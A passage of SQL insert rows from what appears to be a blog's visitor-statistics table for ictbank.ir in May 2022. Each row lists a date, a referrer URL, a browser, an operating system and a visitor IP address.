(21049,'2022-05-18','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','193.118.53.210','000',0,2,0),
(21050,'2022-05-18','http://ictbank.ir/blog','Firefox','Windows','6.1',NULL,NULL,'','88.80.190.181','000',0,2,0),
(21051,'2022-05-18','http://ictbank.ir/blog','Unknown','OS X','10.12.6',NULL,NULL,'','204.48.18.163','000',0,2,0),
(21052,'2022-05-18','http://ictbank.ir','Chrome','Windows','10.0',NULL,NULL,'','109.169.34.43','000',0,5,0),
(21053,'2022-05-18','https://www.google.com/','Chrome','Windows','10.0',NULL,NULL,'','67.81.14.109','000',0,1,0),
(21054,'2022-05-18','http://ictbank.ir/blog','Chrome','OS X','10.9.3',NULL,NULL,'','45.129.18.170','000',0,1,0),
(21055,'2022-05-18','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','54.191.199.102','000',0,1,0),
(21056,'2022-05-18','http://ictbank.ir/blog','Firefox','Windows','6.1',NULL,NULL,'','139.162.200.4','000',0,2,0),
(21057,'2022-05-18','http://ictbank.ir/blog','Chrome','OS X','10.11.5',NULL,NULL,'','212.115.42.250','000',0,1,0),
(21058,'2022-05-18','https://www.google.com/','Chrome','Windows','10.0',NULL,NULL,'','105.67.128.115','000',0,1,0),
(21059,'2022-05-18','http://ictbank.ir','Chrome','Windows','10.0',NULL,NULL,'','212.102.33.233','000',0,1,0),
(21060,'2022-05-18','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','104.238.190.161','000',0,1,0),
(21061,'2022-05-18','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','46.101.79.124','000',0,2,0),
(21062,'2022-05-18','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','138.68.169.239','000',0,1,0),
(21063,'2022-05-18','http://82.102.9.14/','Chrome','OS X','10.7.0',NULL,NULL,'','137.220.228.89','000',0,3,0),
(21064,'2022-05-18','http://ictbank.ir/blog/','Internet Explorer','Windows','5.1',NULL,NULL,'','185.158.115.77','000',0,1,0),
(21065,'2022-05-18','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','128.14.133.58','000',0,2,0),
(21066,'2022-05-19','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','193.106.191.48','000',0,14,0),
(21067,'2022-05-19','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','194.110.115.18','000',0,2,0),
(21068,'2022-05-19','http://ictbank.ir/blog','Chrome','Windows','6.2',NULL,NULL,'','5.188.62.140','000',0,1,0),
(21069,'2022-05-19','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','128.14.209.162','000',0,2,0),
(21070,'2022-05-19','http://82.102.9.14/blog','Chrome','OS X','10.15.7',NULL,NULL,'','209.141.35.128','000',0,2,0),
(21071,'2022-05-19','http://ictbank.ir/blog','Chrome','OS X','Unknown',NULL,NULL,'','111.7.100.16','000',0,3,0),
(21072,'2022-05-19','http://ictbank.ir/blog','Chrome','OS X','10.15.7',NULL,NULL,'','205.185.116.89','000',0,3,0),
(21073,'2022-05-19','http://www.ictbank.ir/blog','Chrome','OS X','10.15.7',NULL,NULL,'','205.185.122.184','000',0,2,0),
(21074,'2022-05-19','http://ictbank.ir/blog','Chrome','OS X','Unknown',NULL,NULL,'','211.95.50.4','000',0,1,0),
(21075,'2022-05-19','http://ictbank.ir/blog','Chrome','OS X','Unknown',NULL,NULL,'','211.95.50.5','000',0,1,0),
(21076,'2022-05-19','http://ictbank.ir/blog','Chrome','OS X','Unknown',NULL,NULL,'','111.7.96.156','000',0,1,0),
(21077,'2022-05-19','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','114.106.8.19','000',0,1,0),
(21078,'2022-05-19','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','185.180.143.145','000',0,2,0),
(21079,'2022-05-19','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','143.110.247.119','000',0,1,0),
(21080,'2022-05-19','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,2,0),
(21081,'2022-05-19','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','139.162.215.70','000',0,2,0),
(21082,'2022-05-19','http://ictbank.ir','Safari','iOS','7.1.1',NULL,NULL,'','198.12.107.235','000',0,1,0),
(21083,'2022-05-19','http://ictbank.ir/blog','Opera','Windows','6.1',NULL,NULL,'','194.126.177.53','000',0,2,0),
(21084,'2022-05-19','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','141.98.1.139','000',0,8,0),
(21085,'2022-05-19','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','162.221.192.26','000',0,4,0),
(21086,'2022-05-19','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','88.99.136.18','000',0,2,0),
(21087,'2022-05-19','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','52.33.205.248','000',0,1,0),
(21088,'2022-05-19','http://ictbank.ir/blog','Chrome','Android','6.0',NULL,NULL,'','101.35.239.216','000',0,1,0),
(21089,'2022-05-19','https://www.google.com/','Firefox','Linux','Unknown',NULL,NULL,'','37.0.71.186','000',0,9,0),
(21090,'2022-05-19','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','185.14.186.217','000',0,1,0),
(21091,'2022-05-19','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','46.101.79.124','000',0,1,0),
(21092,'2022-05-19','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','138.68.169.239','000',0,2,0),
(21093,'2022-05-19','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','94.102.61.10','000',0,2,0),
(21094,'2022-05-19','http://ictbank.ir/blog','Chrome','OS X','Unknown',NULL,NULL,'','101.227.1.196','000',0,1,0),
(21095,'2022-05-19','http://ictbank.ir/blog','Chrome','OS X','Unknown',NULL,NULL,'','101.227.1.197','000',0,1,0),
(21096,'2022-05-19','http://ictbank.ir/blog','Chrome','OS X','Unknown',NULL,NULL,'','211.95.50.7','000',0,1,0),
(21097,'2022-05-19','http://82.102.9.14/blog','Chrome','OS X','10.15.7',NULL,NULL,'','8.31.2.62','000',0,1,0),
(21098,'2022-05-19','http://ictbank.ir/blog','Chrome','OS X','10.15.7',NULL,NULL,'','205.185.117.203','000',0,1,0),
(21099,'2022-05-19','http://www.ictbank.ir/blog','Chrome','OS X','10.15.7',NULL,NULL,'','8.31.2.98','000',0,1,0),
(21100,'2022-05-19','http://ictbank.ir/blog','Chrome','OS X','Unknown',NULL,NULL,'','211.95.50.8','000',0,2,0),
(21101,'2022-05-19','http://82.102.9.14/blog','Chrome','OS X','10.15.7',NULL,NULL,'','209.141.51.49','000',0,1,0),
(21102,'2022-05-19','http://ictbank.ir/blog','Chrome','OS X','Unknown',NULL,NULL,'','111.7.96.155','000',0,2,0),
(21103,'2022-05-19','http://www.ictbank.ir/blog','Chrome','OS X','10.15.7',NULL,NULL,'','209.141.42.155','000',0,1,0),
(21104,'2022-05-19','http://ictbank.ir/blog','Safari','iOS','9.1',NULL,NULL,'','171.118.66.128','000',0,1,0),
(21105,'2022-05-19','http://ictbank.ir/blog','Safari','iOS','9.1',NULL,NULL,'','123.160.172.123','000',0,1,0),
(21106,'2022-05-19','https://www.google.com/','Chrome','OS X','10.15.3',NULL,NULL,'','137.43.124.47','000',0,1,0),
(21107,'2022-05-20','http://ictbank.ir/blog','Chrome','Windows','5.1',NULL,NULL,'','181.214.206.161','000',0,2,0),
(21108,'2022-05-20','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','193.106.191.48','000',0,6,0),
(21109,'2022-05-20','http://wikisonnati.ir/blog','Chrome','OS X','10.13.6',NULL,NULL,'','93.158.91.208','000',0,2,0),
(21110,'2022-05-20','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','5.188.62.21','000',0,4,0),
(21111,'2022-05-20','http://ictbank.ir/blog','Firefox','Windows','5.1',NULL,NULL,'','81.231.48.51','000',0,2,0),
(21112,'2022-05-20','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','185.56.80.65','000',0,1,0),
(21113,'2022-05-20','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','81.169.136.222','000',0,1,0),
(21114,'2022-05-20','http://ictbank.ir/blog','Firefox','OS X','10.14',NULL,NULL,'','185.191.34.215','000',0,3,0),
(21115,'2022-05-20','http://82.102.9.14/blog','Chrome','Android','11',NULL,NULL,'','45.141.157.180','000',0,2,0),
(21116,'2022-05-20','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','34.221.115.3','000',0,1,0),
(21117,'2022-05-20','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','173.213.84.245','000',0,1,0),
(21118,'2022-05-20','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','34.209.97.33','000',0,1,0),
(21119,'2022-05-20','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','128.1.248.26','000',0,2,0),
(21120,'2022-05-20','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','185.180.143.137','000',0,2,0),
(21121,'2022-05-20','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','188.166.158.7','000',0,1,0),
(21122,'2022-05-20','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','198.199.124.144','000',0,1,0),
(21123,'2022-05-20','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','138.68.169.239','000',0,1,0),
(21124,'2022-05-20','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','46.101.79.124','000',0,1,0),
(21125,'2022-05-20','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','20.112.15.62','000',0,1,0),
(21126,'2022-05-20','http://ictbank.ir/blog/index.php/2020/02/06/add-new-disk-to-redhat-based-linux-without-reboot/','Chrome','Windows','10.0',NULL,NULL,'','46.161.11.6','000',0,8,0),
(21127,'2022-05-21','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,16,0),
(21128,'2022-05-21','http://82.102.9.14/','Chrome','OS X','10.7.0',NULL,NULL,'','23.225.163.153','000',0,3,0),
(21129,'2022-05-21','http://ictbank.ir/blog','Opera','OS X','10.6.8',NULL,NULL,'','3.66.75.129','000',0,1,0),
(21130,'2022-05-21','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','193.106.191.48','000',0,8,0),
(21131,'2022-05-21','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','128.14.209.162','000',0,2,0),
(21132,'2022-05-21','http://ictbank.ir/blog','Firefox','Windows','6.1',NULL,NULL,'','176.58.96.131','000',0,2,0),
(21133,'2022-05-21','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','198.23.135.218','000',0,2,0),
(21134,'2022-05-21','http://ictbank.ir/blog','Chrome','Windows','6.2',NULL,NULL,'','124.227.31.98','000',0,1,0),
(21135,'2022-05-21','http://ictbank.ir/blog','Vivaldi','Windows','10.0',NULL,NULL,'','195.181.168.180','000',0,2,0),
(21136,'2022-05-21','http://ictbank.ir/blog','Vivaldi','Windows','10.0',NULL,NULL,'','195.181.168.183','000',0,4,0),
(21137,'2022-05-21','http://ictbank.ir/blog','Vivaldi','Windows','10.0',NULL,NULL,'','195.181.168.181','000',0,4,0),
(21138,'2022-05-21','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','54.218.30.188','000',0,1,0),
(21139,'2022-05-21','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','193.118.53.210','000',0,2,0),
(21140,'2022-05-21','http://82.102.9.14:80/blog','Firefox','Windows','10.0',NULL,NULL,'','45.83.64.221','000',0,1,0),
(21141,'2022-05-21','http://ictbank.ir/blog/index.php/product-category/uncategorized/','Chrome','Windows','10.0',NULL,NULL,'','46.161.11.4','000',0,7,0),
(21142,'2022-05-21','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','202.21.38.53','000',0,2,0),
(21143,'2022-05-21','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','95.179.208.185','000',0,1,0),
(21144,'2022-05-21','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','185.14.186.217','000',0,1,0),
(21145,'2022-05-21','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','185.14.184.98','000',0,1,0),
(21146,'2022-05-21','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','46.101.79.124','000',0,1,0),
(21147,'2022-05-21','http://ictbank.ir/blog','Unknown','OS X','10.9.2',NULL,NULL,'','94.247.172.129','000',0,2,0),
(21148,'2022-05-22','http://ictbank.ir/blog','Chrome','OS X','10.13.6',NULL,NULL,'','130.255.166.158','000',0,1,0),
(21149,'2022-05-22','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,16,0),
(21150,'2022-05-22','http://82.102.9.14:80/blog','360 Safe Explorer','Windows','6.1',NULL,NULL,'','183.136.225.9','000',0,4,0),
(21151,'2022-05-22','http://ictbank.ir/blog','Chrome','OS X','10.15.7',NULL,NULL,'','2.185.144.134','000',0,2,0),
(21152,'2022-05-22','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','128.1.248.42','000',0,2,0),
(21153,'2022-05-22','http://ictbank.ir/blog','Opera','Windows','6.1',NULL,NULL,'','91.219.215.157','000',0,2,0),
(21154,'2022-05-22','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','193.106.191.48','000',0,10,0),
(21155,'2022-05-22','http://ictbank.ir/blog','Opera','Windows','6.1',NULL,NULL,'','194.126.177.54','000',0,2,0),
(21156,'2022-05-22','http://ictbank.ir/blog','Firefox','Windows','6.1',NULL,NULL,'','42.51.222.184','000',0,1,0),
(21157,'2022-05-22','http://ictbank.ir/blog','Chrome','OS X','10.10.3',NULL,NULL,'','133.18.205.120','000',0,2,0),
(21158,'2022-05-22','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','54.184.221.192','000',0,1,0),
(21159,'2022-05-22','https://www.google.com/','Chrome','Windows','10.0',NULL,NULL,'','189.101.52.242','000',0,1,0),
(21160,'2022-05-22','https://www.google.com/','Chrome','OS X','10.15.7',NULL,NULL,'','94.132.223.77','000',0,1,0),
(21161,'2022-05-22','http://ictbank.ir/blog/index.php/2020/02/02/rebuild-and-reorganize-all-indexes-within-a-database/','Chrome','Windows','10.0',NULL,NULL,'','46.161.11.8','000',0,8,0),
(21162,'2022-05-22','http://ictbank.ir/blog','Internet Explorer','Windows','6.2',NULL,NULL,'','195.154.42.124','000',0,3,0),
(21163,'2022-05-22','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','138.68.169.239','000',0,1,0),
(21164,'2022-05-22','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','95.179.208.185','000',0,1,0),
(21165,'2022-05-22','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','185.14.184.98','000',0,1,0),
(21166,'2022-05-22','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','188.166.158.7','000',0,1,0),
(21167,'2022-05-22','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','94.102.61.10','000',0,2,0),
(21168,'2022-05-22','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','23.154.177.20','000',0,1,0),
(21169,'2022-05-22','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','4.16.252.229','000',0,1,0),
(21170,'2022-05-23','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','4.16.252.229','000',0,9,0),
(21171,'2022-05-23','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,16,0),
(21172,'2022-05-23','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','193.106.191.48','000',0,10,0),
(21173,'2022-05-23','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','213.161.23.183','000',0,2,0),
(21174,'2022-05-23','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','128.1.248.26','000',0,2,0),
(21175,'2022-05-23','http://ictbank.ir/blog/index.php/2020/03/24/one-way-to-prevent-ddos-attacks-in-wordpress/#comment-82','Chrome','Windows','6.1',NULL,NULL,'','178.159.37.11','000',0,8,0),
(21176,'2022-05-23','http://ictbank.ir/blog','Chrome','Windows','6.3',NULL,NULL,'','46.166.162.87','000',0,1,0),
(21177,'2022-05-23','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','112.66.98.21','000',0,1,0),
(21178,'2022-05-23','https://www.google.com/','Chrome','Windows','10.0',NULL,NULL,'','195.173.80.1','000',0,1,0),
(21179,'2022-05-23','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','128.14.134.134','000',0,2,0),
(21180,'2022-05-23','http://www.ictbank.ir/blog','Chrome','OS X','10.15.7',NULL,NULL,'','209.141.36.231','000',0,1,0),
(21181,'2022-05-23','http://82.102.9.14/blog','Chrome','OS X','10.15.7',NULL,NULL,'','209.141.42.155','000',0,1,0),
(21182,'2022-05-23','http://ictbank.ir/blog','Chrome','OS X','Unknown',NULL,NULL,'','209.141.41.193','000',0,3,0),
(21183,'2022-05-23','http://ictbank.ir/blog','Chrome','OS X','Unknown',NULL,NULL,'','209.141.36.112','000',0,2,0),
(21184,'2022-05-23','http://ictbank.ir/blog','Chrome','OS X','Unknown',NULL,NULL,'','209.141.35.128','000',0,1,0),
(21185,'2022-05-23','http://mail.design-arena.ir/blog','Chrome','OS X','10.15.7',NULL,NULL,'','8.31.2.98','000',0,1,0),
(21186,'2022-05-23','http://ictbank.ir/blog','Chrome','OS X','Unknown',NULL,NULL,'','205.185.122.184','000',0,1,0),
(21187,'2022-05-23','http://ictbank.ir/blog','Chrome','OS X','Unknown',NULL,NULL,'','209.141.51.222','000',0,1,0),
(21188,'2022-05-23','http://ictbank.ir/blog','Opera','Ubuntu','14.10',NULL,NULL,'','3.66.75.129','000',0,1,0),
(21189,'2022-05-23','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','185.14.186.217','000',0,1,0),
(21190,'2022-05-23','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','138.68.169.239','000',0,1,0),
(21191,'2022-05-23','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','188.166.158.7','000',0,1,0),
(21192,'2022-05-23','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','46.101.79.124','000',0,1,0),
(21193,'2022-05-23','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','185.180.143.137','000',0,2,0),
(21194,'2022-05-24','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','185.142.236.40','000',0,2,0),
(21195,'2022-05-24','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','49.12.126.16','000',0,1,0),
(21196,'2022-05-24','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','193.106.191.48','000',0,11,0),
(21197,'2022-05-24','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,2,0),
(21198,'2022-05-24','http://ictbank.ir/blog','Vivaldi','Windows','10.0',NULL,NULL,'','195.181.168.182','000',0,2,0),
(21199,'2022-05-24','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','51.178.17.192','000',0,2,0),
(21200,'2022-05-24','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','157.245.148.133','000',0,2,0),
(21201,'2022-05-24','http://ictbank.ir/blog','Edge','Windows','10.0',NULL,NULL,'','46.161.27.204','000',0,5,0),
(21202,'2022-05-24','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','45.33.96.205','000',0,1,0),
(21204,'2022-05-24','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','133.167.85.166','000',0,5,0),
(21205,'2022-05-24','http://ictbank.ir/blog','Chrome','Windows','6.3',NULL,NULL,'','46.161.11.66','000',0,3,0),
(21206,'2022-05-24','http://ictbank.ir/blog','Firefox','Windows','5.1',NULL,NULL,'','20.115.46.213','000',0,2,0),
(21207,'2022-05-24','http://ictbank.ir','Chrome','Windows','10.0',NULL,NULL,'','51.83.213.191','000',0,2,0),
(21208,'2022-05-24','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','162.221.192.26','000',0,2,0),
(21209,'2022-05-24','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','80.82.77.33','000',0,2,0),
(21210,'2022-05-24','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','112.171.82.166','000',0,1,0),
(21211,'2022-05-24','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','104.200.16.250','000',0,2,0),
(21212,'2022-05-24','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','51.254.199.11','000',0,2,0),
(21213,'2022-05-24','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','162.0.232.99','000',0,2,0),
(21214,'2022-05-24','http://ictbank.ir/blog','Android Browser','Android','6.0',NULL,NULL,'','61.147.15.67','000',0,4,0),
(21215,'2022-05-24','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','18.237.208.238','000',0,1,0),
(21216,'2022-05-24','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','34.212.46.109','000',0,1,0),
(21217,'2022-05-24','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','172.105.161.246','000',0,2,0),
(21218,'2022-05-24','http://ictbank.ir/blog','Safari','iOS','9.1',NULL,NULL,'','59.173.180.45','000',0,1,0),
(21219,'2022-05-24','http://ictbank.ir/blog','Safari','iOS','9.1',NULL,NULL,'','36.106.167.4','000',0,1,0),
(21220,'2022-05-24','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','128.14.134.134','000',0,2,0),
(21221,'2022-05-24','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','198.211.123.140','000',0,1,0),
(21222,'2022-05-24','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','198.211.127.43','000',0,1,0),
(21223,'2022-05-24','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','188.166.158.7','000',0,1,0),
(21224,'2022-05-24','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','138.68.169.239','000',0,1,0),
(21225,'2022-05-24','http://ictbank.ir/blog/index.php/2020/02/02/change-the-character-set-collation-of-a-table/','Chrome','Windows','6.1',NULL,NULL,'','46.161.11.4','000',0,8,0),
(21226,'2022-05-24','https://www.google.com/','Firefox','Linux','Unknown',NULL,NULL,'','179.240.19.62','000',0,1,0),
(21227,'2022-05-25','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','193.106.191.48','000',0,11,0),
(21228,'2022-05-25','http://ictbank.ir/blog','Chrome','Windows','6.3',NULL,NULL,'','173.252.95.2','000',0,1,0),
(21229,'2022-05-25','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','193.118.53.194','000',0,2,0),
(21230,'2022-05-25','http://82.102.9.14/blog','Firefox','Linux','Unknown',NULL,NULL,'','165.227.99.18','000',0,2,0),
(21231,'2022-05-25','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','104.248.17.208','000',0,1,0),
(21232,'2022-05-25','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','14.161.46.255','000',0,1,0),
(21233,'2022-05-25','https://www.google.com/','Chrome','Linux','Unknown',NULL,NULL,'','102.218.29.24','000',0,1,0),
(21234,'2022-05-25','https://www.google.com/','Chrome','Linux','Unknown',NULL,NULL,'','185.19.6.13','000',0,1,0),
(21235,'2022-05-25','http://ictbank.ir','Chrome','Windows','10.0',NULL,NULL,'','54.37.132.86','000',0,2,0),
(21236,'2022-05-25','http://ictbank.ir/blog','Firefox','Windows','5.1',NULL,NULL,'','161.230.158.192','000',0,2,0),
(21237,'2022-05-25','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','138.68.24.204','000',0,2,0),
(21238,'2022-05-25','http://ictbank.ir/blog','Firefox','Windows','6.2',NULL,NULL,'','54.208.155.232','000',0,2,0),
(21239,'2022-05-25','https://www.google.com/','Chrome','Windows','10.0',NULL,NULL,'','147.161.249.98','000',0,1,0),
(21240,'2022-05-25','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','128.14.134.170','000',0,2,0),
(21241,'2022-05-25','https://www.google.be/','Chrome','Windows','10.0',NULL,NULL,'','158.169.40.17','000',0,1,0),
(21242,'2022-05-25','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','54.190.25.131','000',0,1,0),
(21243,'2022-05-25','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','18.236.86.77','000',0,1,0),
(21244,'2022-05-25','http://ictbank.ir/blog','Firefox','OS X','10.14',NULL,NULL,'','51.254.199.11','000',0,1,0),
(21245,'2022-05-25','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,2,0),
(21246,'2022-05-25','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','46.101.79.124','000',0,2,0),
(21247,'2022-05-25','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','108.61.208.75','000',0,1,0),
(21248,'2022-05-25','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','138.68.169.239','000',0,1,0),
(21249,'2022-05-25','http://ictbank.ir/blog','Chrome','Windows','6.0',NULL,NULL,'','5.188.62.76','000',0,3,0),
(21250,'2022-05-25','http://ictbank.ir/blog','Chrome','OS X','10.8.3',NULL,NULL,'','34.217.112.215','000',0,1,0),
(21251,'2022-05-25','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','185.180.143.11','000',0,2,0),
(21252,'2022-05-25','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','64.225.18.245','000',0,2,0),
(21253,'2022-05-25','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','193.118.53.202','000',0,2,0),
(21254,'2022-05-26','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','193.106.191.48','000',0,13,0),
(21255,'2022-05-26','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','41.243.14.238','000',0,1,0),
(21256,'2022-05-26','http://82.102.9.14/','Chrome','OS X','10.7.0',NULL,NULL,'','27.124.32.176','000',0,3,0),
(21257,'2022-05-26','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','128.14.133.58','000',0,2,0),
(21258,'2022-05-26','http://ictbank.ir/blog','Chrome','OS X','10.8.3',NULL,NULL,'','100.20.87.111','000',0,2,0),
(21259,'2022-05-26','https://www.bing.com','Chrome','Windows','6.2',NULL,NULL,'','138.197.216.92','000',0,1,0),
(21260,'2022-05-26','http://ictbank.ir/blog','Android Browser','Android','1.5',NULL,NULL,'','38.242.214.236','000',0,1,0),
(21261,'2022-05-26','http://ictbank.ir/blog','Firefox','Windows','6.1',NULL,NULL,'','3.66.75.129','000',0,1,0),
(21262,'2022-05-26','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','94.102.61.10','000',0,2,0),
(21263,'2022-05-26','http://ictbank.ir/blog','Firefox','Windows','5.1',NULL,NULL,'','89.160.85.193','000',0,2,0),
(21264,'2022-05-26','http://ictbank.ir/blog','Internet Explorer','Windows','6.0',NULL,NULL,'','43.154.171.110','000',0,1,0),
(21265,'2022-05-26','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','128.1.248.42','000',0,2,0),
(21266,'2022-05-26','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','185.56.80.65','000',0,1,0),
(21267,'2022-05-26','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','193.118.53.202','000',0,2,0),
(21268,'2022-05-26','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,2,0),
(21269,'2022-05-26','http://ictbank.ir/blog','Chrome','OS X','10.14.6',NULL,NULL,'','47.242.95.113','000',0,1,0),
(21270,'2022-05-26','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','35.85.34.61','000',0,1,0),
(21271,'2022-05-26','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','95.179.220.182','000',0,1,0),
(21272,'2022-05-26','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','198.199.124.144','000',0,1,0),
(21273,'2022-05-26','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','185.14.184.98','000',0,1,0),
(21274,'2022-05-26','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','138.68.169.239','000',0,1,0),
(21275,'2022-05-26','http://ictbank.ir/blog','Internet Explorer','Windows','6.1',NULL,NULL,'','218.78.30.65','000',0,2,0),
